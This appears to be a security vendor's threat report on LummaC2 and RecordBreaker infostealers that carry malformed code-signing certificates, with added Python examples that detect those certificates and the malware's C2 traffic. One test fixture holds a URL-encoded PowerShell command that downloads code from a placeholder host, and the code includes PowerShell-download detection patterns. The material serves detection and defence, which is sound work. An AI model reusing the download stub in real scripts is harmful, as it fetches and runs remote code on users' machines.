Malware signed with abnormal certificates has recently been distributed in high volume.
Malware often disguises itself with a legitimate-looking certificate. In this case, however, the certificate fields were filled with random data, and the Subject Name and Issuer Name fields contain unusually long strings.
As a result, Windows does not display the certificate information at all, and a dedicated tool or analysis infrastructure is required to inspect the structure of these certificates.
Naturally, these certificates fail signature verification since they are malformed, and they cannot function as valid signatures in any way. However, when the signature strings are examined, they contain Arabic, Japanese and other non-English scripts along with special characters and punctuation marks, which diverges from the structure of a typical English string. Furthermore, similar samples have been consistently distributed with slight structural variations for over two months, suggesting a specific intent behind this technique.
In the latest sample in circulation (bottom right of Figure 1), the string is a URL-encoded malicious script. The script is designed to download and execute PowerShell commands from a specific address, but the download currently fails, and the script is not executed during the infection process.
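The following Python is an added example, not AhnLab's detection logic or any tool from the original post. It walks a DER-encoded X.509 Name (the SEQUENCE OF SET OF AttributeTypeAndValue structure used for Subject and Issuer) with a minimal ASN.1 reader, then applies the three heuristics the post describes: values far longer than any legitimate name, values containing non-Latin script, and values that URL-decode to a PowerShell download stub. The sample names, the 64-character threshold (RFC 5280's ub-common-name) and the keyword list are constructed assumptions for the demo.

```python
"""Flag X.509 Subject/Issuer Names with abnormally long, non-Latin or
URL-encoded-script values.  Added example; all sample data is constructed."""
import re
import unicodedata
from urllib.parse import unquote

SEQUENCE, SET, OID, UTF8STRING = 0x30, 0x31, 0x06, 0x0C
CN_OID = bytes.fromhex("550403")   # id-at-commonName (2.5.4.3)
MAX_NAME_LEN = 64                  # assumption: RFC 5280 ub-common-name


def der_len(n):
    """Encode an ASN.1 length (short form below 128, long form above)."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag, payload):
    return bytes([tag]) + der_len(len(payload)) + payload


def make_name(cn):
    """Build a DER Name with a single commonName attribute (test data only)."""
    atv = tlv(SEQUENCE, tlv(OID, CN_OID) + tlv(UTF8STRING, cn.encode("utf-8")))
    return tlv(SEQUENCE, tlv(SET, atv))


def read_tlv(buf, pos):
    """Return (tag, value, next_pos) for the TLV starting at pos."""
    tag, first = buf[pos], buf[pos + 1]
    if first < 0x80:
        length, pos = first, pos + 2
    else:
        n = first & 0x7F
        length = int.from_bytes(buf[pos + 2:pos + 2 + n], "big")
        pos += 2 + n
    return tag, buf[pos:pos + length], pos + length


def parse_name(der):
    """Walk Name -> RDN (SET) -> AttributeTypeAndValue; return (oid_hex, value)."""
    tag, rdns, _ = read_tlv(der, 0)
    if tag != SEQUENCE:
        raise ValueError("Name must be a SEQUENCE")
    values, pos = [], 0
    while pos < len(rdns):
        tag, rdn, pos = read_tlv(rdns, pos)
        if tag != SET:
            raise ValueError("RDN must be a SET")
        inner = 0
        while inner < len(rdn):
            _, atv, inner = read_tlv(rdn, inner)
            _, oid, p = read_tlv(atv, 0)
            _, val, _ = read_tlv(atv, p)
            values.append((oid.hex(), val.decode("utf-8", "replace")))
    return values


def scripts_in(text):
    """Unicode script prefixes (ARABIC, HIRAGANA, CJK, ...) of non-ASCII letters."""
    return {unicodedata.name(c, "UNKNOWN").split()[0]
            for c in text if c.isalpha() and not c.isascii()}


def assess_name(der):
    """Apply the length / script / URL-encoded-script heuristics to every value."""
    findings = []
    for oid, val in parse_name(der):
        if len(val) > MAX_NAME_LEN:
            findings.append(f"{oid}: length {len(val)} exceeds {MAX_NAME_LEN}")
        scripts = scripts_in(val)
        if scripts:
            findings.append(f"{oid}: non-Latin script {sorted(scripts)}")
        decoded = unquote(val)
        if decoded != val and re.search(r"powershell|downloadstring", decoded, re.I):
            findings.append(f"{oid}: URL-encoded PowerShell script")
    return {"suspicious": bool(findings), "findings": findings}


# Constructed samples: a plausible vendor name, a long mixed-script junk
# string like the ones described above, and a URL-encoded download stub.
LEGIT = make_name("Contoso Software Ltd")
ABNORMAL = make_name("x7#!" + "\u0642" * 40 + "\u3042\u3044\u3046" * 30 + ";;" * 20)
SCRIPT = make_name("powershell%20-c%20%22(New-Object%20Net.WebClient)"
                   ".DownloadString('http://example.invalid/a')%22")

if __name__ == "__main__":
    for label, der in (("legit", LEGIT), ("abnormal", ABNORMAL), ("script", SCRIPT)):
        print(label, assess_name(der))
```

In a real PE the Name sits inside the Authenticode PKCS#7 blob in the security data directory; this example operates on an already extracted Name, which is the part Windows refuses to render when it is this malformed.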
Among the malware currently distributed in this distinctive form, two strains predominate: LummaC2 and RecordBreaker. Both are capable of various malicious behaviors, but their primary focus is information theft.
Upon infection, they transmit sensitive user information such as browser-saved credentials, documents and cryptocurrency wallet files to the threat actor, potentially resulting in severe secondary damage. Furthermore, additional malware chosen by the threat actor is installed, enabling continued malicious activity.
These types of malware are distributed via malicious pages that are easily reachable through search engines (SEO poisoning), posing a threat to a wide range of unspecified users. The malicious pages primarily target keywords related to illegal programs such as serials, keygens and cracks.
RecordBreaker is also known as Raccoon Stealer V2. In addition to the distribution method above, it is actively distributed through YouTube and by other malware. One of its distinctive characteristics is the use of a meaningful sentence as the User-Agent value when connecting to the C2 server, and this value is changed periodically. The sample currently in distribution uses the string "GeekingToTheMoon". Functionally, it has not changed significantly from what was described in the previous posts below.
- RecordBreaker Infostealer Disguised as a .NET Installer
- RecordBreaker Infostealer Disguised as a Well-known Korean Software
- RecordBreaker Stealer Distributed via Hacked YouTube Accounts
LummaC2 is the most actively evolving malware among those distributed via the method described in this post.
The initial sample had its configuration embedded within the malware itself. Later variants switched to downloading the configuration from the C2 before performing their malicious behaviors, and in addition to simple infostealing they began to install additional malware such as Amadey and ClipBanker.
Information regarding the initial distribution sample is detailed in the post below, followed by a brief summary of the changes since then.
– Change of C2 communication method
Since the initial sample had its configuration embedded, it collected information immediately upon execution and transmitted it to the "/c2sock" path.
Subsequent variants downloaded the configuration from the "/c2conf" path and transmitted the stolen information to the "/c2sock" path.
Recent samples use the "/api" path both to download the configuration and to transmit the stolen information. Configuration queries and exfiltration connections are therefore distinguished only by the POST parameters sent to the C2.
With each significant variation, the "ver" parameter sent to the C2 upon execution was incremented by 1. The current version is 4.0.
".xyz" was used as the top-level domain (TLD) of the C2 URL for a significant period before being switched to the current ".fun".
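The following Python is an added example, not AhnLab's detection logic, and it serves both the RecordBreaker User-Agent indicator described earlier and the LummaC2 C2 changes summarized above. It turns the post's observations into a rule set over parsed HTTP requests: a POST to /c2sock, /c2conf or /api that carries a "ver" form field or targets a .xyz/.fun host is flagged as LummaC2 (with the variant stage inferred from the path for the older layouts, and the POST field names reported for /api so the analyst can tell the two uses apart), and a request whose User-Agent is "GeekingToTheMoon" is flagged as RecordBreaker. The pipe-separated log format, the hostnames and the request bodies are constructed for the demo.

```python
"""Flag LummaC2 and RecordBreaker C2 traffic in constructed HTTP log lines.
Added example; indicators come from the post, sample data is made up."""
from urllib.parse import parse_qs, urlsplit

# Path -> what that path carried in the variant that used it.
LUMMA_PATHS = {"/c2sock": "exfil", "/c2conf": "config", "/api": "config-or-exfil"}
LUMMA_TLDS = (".xyz", ".fun")            # observed C2 TLDs, older then current
RECORDBREAKER_UAS = {"GeekingToTheMoon"}  # rotated periodically; extend as observed


def parse_log_line(line):
    """Constructed format: 'METHOD URL | User-Agent | form-encoded body'."""
    parts = [p.strip() for p in line.split("|")]
    req, ua, body = (parts + ["", ""])[:3]
    method, url = req.split(" ", 1)
    u = urlsplit(url)
    return {"method": method, "host": (u.hostname or "").lower(),
            "path": u.path, "ua": ua, "body": body}


def classify(req):
    """Return an alert dict for a C2-looking request, or None."""
    form = {k: v[0] for k, v in parse_qs(req["body"]).items()}
    if req["method"] == "POST" and req["path"] in LUMMA_PATHS:
        ver = form.get("ver")
        # /api is a common legitimate path, so require the ver field or a
        # known C2 TLD rather than alerting on the path alone.
        if ver is not None or req["host"].endswith(LUMMA_TLDS):
            return {"family": "LummaC2", "host": req["host"], "path": req["path"],
                    "stage": LUMMA_PATHS[req["path"]], "ver": ver,
                    "fields": sorted(form)}
    if req["ua"] in RECORDBREAKER_UAS:
        return {"family": "RecordBreaker", "host": req["host"], "ua": req["ua"]}
    return None


def scan(lines):
    """Classify every line and keep only the alerts."""
    return [a for a in (classify(parse_log_line(l)) for l in lines) if a]


# Constructed traffic: an older LummaC2 config fetch, a current /api beacon,
# ordinary browsing, a RecordBreaker check-in, and a benign /api login.
SAMPLE_LOG = [
    "POST http://conf-host.xyz/c2conf | Mozilla/5.0 | ver=2.0",
    "POST http://cur-host.fun/api | Mozilla/5.0 | ver=4.0",
    "GET http://www.example.com/index.html | Mozilla/5.0 |",
    "POST http://203.0.113.5/ | GeekingToTheMoon |",
    "POST http://api.example.com/api | Mozilla/5.0 | action=login",
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

The "ver" value doubles as a variant marker: because the post reports it climbing by one with each major change, a sudden 5.0 in the alerts is an early hint that a new variant is circulating.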
– Downloads additional malware
While earlier samples simply stole information and terminated, later versions began installing the Amadey malware. Recent versions install both Amadey and ClipBanker.
As a downloader, Amadey lets the threat actor install whatever malware they want through C2 communication, and it can also perform infostealing through additional modules depending on the situation. ClipBanker is a type of malware that monitors the clipboard: if it detects a cryptocurrency wallet address being copied, it replaces it with the threat actor's address.
LummaC2 terminates after stealing information and installing the additional malware. However, the additionally installed malware remains on the user's system, continuing to communicate with its C2 (waiting for commands) or tampering with wallet addresses.
User caution is advised, as infostealers are being actively distributed to unsuspecting users and are evolving continuously.
AhnLab products detect these abnormal certificate structures. Additionally, an automated collection system for samples similar to those described in this post is in operation, enabling a swift response to variants and the blocking of associated C2 connections.
- Suspicious/Win.MalPe.X2197 (2023.09.14.00)
- Additionally Downloaded Malware